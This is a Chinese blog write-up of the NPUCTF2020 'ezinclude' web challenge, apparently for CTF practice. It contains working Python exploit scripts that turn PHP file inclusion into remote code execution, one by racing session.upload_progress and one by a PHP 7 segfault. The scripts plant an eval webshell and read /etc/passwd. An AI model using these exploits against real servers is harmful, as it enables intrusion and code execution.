[ctf web][NPUCTF2020]ezinclude + (session对话[session.upload_progress]文件包含 + php7 segment fault特性)

最新推荐文章于 2024-03-18 20:55:10 发布
最新推荐文章于 2024-03-18 20:55:10 发布
阅读量966 收藏
点赞数 5
分类专栏: ctf # web 文章标签: php linux ctf web 文件包含
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/120204436
版权
ctf 同时被 2 个专栏收录
85 篇文章 9 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

知识点

利用session对话[session.upload_progress]进行文件包含

利用session对话session.upload_progress条件竞争将命令写入session文件,然后包含这个session文件,执行php命令
当session.use_strict_mode为on,我们可以自己设置Cookie:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag”。
在Linux系统中,session文件一般的默认存储位置为 /tmp 或 /var/lib/php/session


php7 segment fault特性

段错误(segment fault)就是指访问的内存超过了系统所给这个程序的内存空间。从而发生程序退出。缓存文件就留在了tmp目录
向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留

让PHP异常崩溃的payload:
php < 7.2

php://filter/string.strip_tags/resource=/etc/passwd

php7 老版本通杀

php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA


wp

[NPUCTF2020]ezinclude

查看源码发现提示<!--md5($secret.$name)===$pass -->
get传$name$pass,然后发现cookie中有hash
在这里插入图片描述hash是随着name变化的,猜测hash就是md5($secret.$name),传参发现有个重定向(如果是在view-source状态下不会重定向过去的)

在这里插入图片描述
flflflflag.php,文件包含
在这里插入图片描述
可以用php://filter读源码

/flflflflag.php?file=php://filter/convert.base64-encode/resource=index.php

在这里插入图片描述


1.源码

index.php

<?php
include 'config.php';
@$name=$_GET['name'];
@$pass=$_GET['pass'];
if(md5($secret.$name)===$pass){
	echo '<script language="javascript" type="text/javascript">
           window.location.href="flflflflag.php";
	</script>
';
}else{
	setcookie("Hash",md5($secret.$name),time()+3600000);
	echo "username/password error";
}
?>
<html>
<!--md5($secret.$name)===$pass -->
</html>

config.php

<?php
$secret='%^$&$#fffdflag_is_not_here_ha_ha';
?>

flflflflag.php

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

过滤了data和input,可能无法直接执行命令了

扫描还可以得到dir.php,显示/tmp底下的文件

<?php
var_dump(scandir('/tmp'));
?>

在这里插入图片描述


2.文件包含

way1 利用session对话[session.upload_progress]进行文件包含

思路:利用session.upload_progress条件竞争将命令写入session文件,然后包含这个session文件,执行php命令,写入一句话木马shell.php


我们可以看到cookie里面没有phpsessid,当session.use_strict_mode为on,我们可以自己设置Cookie:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag”。
在Linux系统中,session文件一般的默认存储位置为 /tmp 或 /var/lib/php/session

大佬的脚本:写入shell的python脚本

import io
import sys
import requests
import threading

host = 'http://de198dd7-5ee5-4fae-a188-83bc584d65a9.node4.buuoj.cn:81/flflflflag.php'
sessid = 'vrh'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
        # if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)

在这里插入图片描述
蚁剑可以连shell,但flag不在服务器里面,在phpinfo里
在这里插入图片描述
在这里插入图片描述


way2 利用php7 segment fault特性

向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留

php < 7.2的payload

php://filter/string.strip_tags/resource=/etc/passwd

写个脚本传文件

import requests

url='http://5ca9dea7-ab1a-4366-b169-d07b563323d0.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd'
aaa = {
    'file':('aa.php',
    '<?php @eval($_POST[cmd])?>')			
    //get的🐎好像用不了欸,不对,是我get传参的方式错了,应该是?file=xxx&cmd=phpinfo();这样
	}

r = requests.post(url=url,files=aaa)
print(r.text)

在这里插入图片描述
再访问dir会发现多了个文件/tmp/phpqJEtDK(我试了好多遍…)
在这里插入图片描述
在这里插入图片描述
补个大佬的漂亮脚本,我怎么传文件脚本都写得这么丑

import requests
from io import BytesIO
url="http://f0af8aa4-9e9c-40a8-9003-175dbc6f69f8.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
payload="<?php phpinfo();?>"
files={
    "file":BytesIO(payload.encode())
}
r=requests.post(url=url,files=files,allow_redirects=False)

print(r.text)

参考链接:
https://blog.csdn.net/rfrder/article/details/114656092
https://guokeya.github.io/post/cbMk6sLKe/

shu天
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9382
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
CTF从入门到提升(十三)文件包含session及例题详解
anquanniu的博客
09-12 2727
具体场景——session 我们可以查一下手册,看看这个参数是默认开启: 举栗子 ​ 通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。 这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,file...
Python-dsstore:用于解析.DS_Store文件并提取文件名的库
05-03
Python .DS_Store解析器 该存储库包含Apple的.DS_Store文件格式的解析器。 ./samples/目录中包含一个CTF格式的示例文件,您可以使用python3 main.py ./samples/.DS_Store.ctf尝试解析器。 这是我的博客文章,试图详细解释其结构和格式: : 用法 $ python main.py samples/.DS_Store.ctf Count: 6 favicon.ico flag static templates vulnerable.py vulnerable.wsgi 有用的资源 我发现以下链接在开发解析器时非常有帮助: 执照 麻省理工学院-请参阅License.md
CTF——Web——文件包含漏洞
热门推荐
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
文件包含漏洞之包含SESSIONCTF题目)
最新发布
m0_70349048的博客
03-18 706
文件包含漏洞之包含session
记一题CTF safe_include
FROM_my_world的博客
03-11 1465
记一题CTF safe_include
PHP7部分有趣的新特性
wang78699425的专栏
01-02 177
支持goto语句 goto a; echo 'Foo'; a: echo 'Bar'; for($i=0,$j=50; $i&lt;100; $i++) { while($j--) { if($j==17) goto end; } } echo "i = $i"; end: echo 'j...
CTFweb篇-Session包含
weixin_44597701的博客
08-07 3813
什么是Session Session就是保存在服务器的文本文件。 默认情况下,PHP.ini 中设置的 SESSION 保存方式是 files(session.save_handler = files),即使用读写文件的方式保存 SESSION 数据,而 SESSION 文件保存的目录由 session.save_path 指定,文件名以 sess_ 为前缀,后跟 SESSION ID,如:sess_c72665af28a8b14c0fe11afe3b59b51b。文件中的数据即是序列化之后的 SESSIO
CTF从入门到提升(十四)session phpinfo包含及例题详解
anquanniu的博客
09-16 1875
具体场景——session PHP默认生成的session文件往往存放在/tmp目录下 举栗子 ​ 题目内容:看看我的notebooktips; tips:文件包含phpinfo是不是有新的发现 用给到的内容去做题目,我们可以看一下这道题目,进来之后首页找到url。 如果把php删掉,会发现登录入口不存在,初步推断php是后缀名会自动拼接到URL后面。 有了这个设想判断后,我们去读文件log...
使用AXIOS的ONUPLOADPROGRESS制作上传进度条--以及ONUPLOADPROGRESS的源码解读
mrsun_web
10-12 1498
1,从名字就可以看出来,这是允许为上传处理进度的事件。他是axios的请求配置之一。 axios({ method: 'post', url: this.uploadurl, data: formData, headers: { 'Content-Type': 'multipart/form-data' // 文件上传 }, //文件上传进度值 onUploadProgre
php7 uploadprogress,上传进度支持(Upload progress in sessions)
weixin_39628160的博客
03-12 119
文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现.虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足:1. 他们都需要额外安装(我们并没有打算把APC加入PHP5.4)2. 它们都使用本地机制来存储这些信息, APC使用共享内存, 而upload...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
DS_Store 文件泄露
07-11
DS_Store 文件泄露 是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。 .DS_Store是Mac下Finder用来保存如何展示文件/文件夹 的数据文件(即文件夹的显示属性的,和比文件图标的摆放...
CTF.rar_ctf_seed7rj
09-21
CEUCE T FEHRENHET CNVERTER
2021-10-12T15_45_11.763203+00_00webshell.pcapng.zip
10-21
CTF附件题——Webshell密码 某次攻防演练中,抓到了一个webshell的流量,请分析出密码,flag形式:flag{密码}
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 3960
文件包含漏洞详解
ctf_show笔记篇(web入门---文件上传)
whale_waves的博客
03-06 815
这里利用.user.ini文件,只要访问同目录下的php文件就能把目标png文件当作php文件加载。可以直接写payload获得flag,不用在继续$_POST之类的。自行搜索绕过一下其他的和153题无异。这里就关系到了网站中间件的设置问题。使用GIF89a在文件最上方添加。但是会验证图片头信息。
php 上传图片 进度,php+uploadprogress实现上传进度功能
weixin_39966740的博客
03-10 142
文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现.虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足:1. 他们都需要额外安装(我们并没有打算把APC加入PHP5.4)2. 它们都使用本地机制来存储这些信息, APC使用共享内存, 而uploadprogr...
antdesign+vue+ts自定义上传文件customRequest,显示进度条onProgress,axios请求中断axios.CancelToken。
flowerSmiler的博客
01-04 4947
antdesign+vue+ts自定义上传文件customRequest,显示进度条onProgress,axios请求中断axios.CancelToken。 axios请求配置onUploadProgress,通过loaded和total计算出进度,自定义上传的onProgress同步进度到ant组件. toFixed(2)) } % ` , class : 'test' } // 上传进度条 const
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值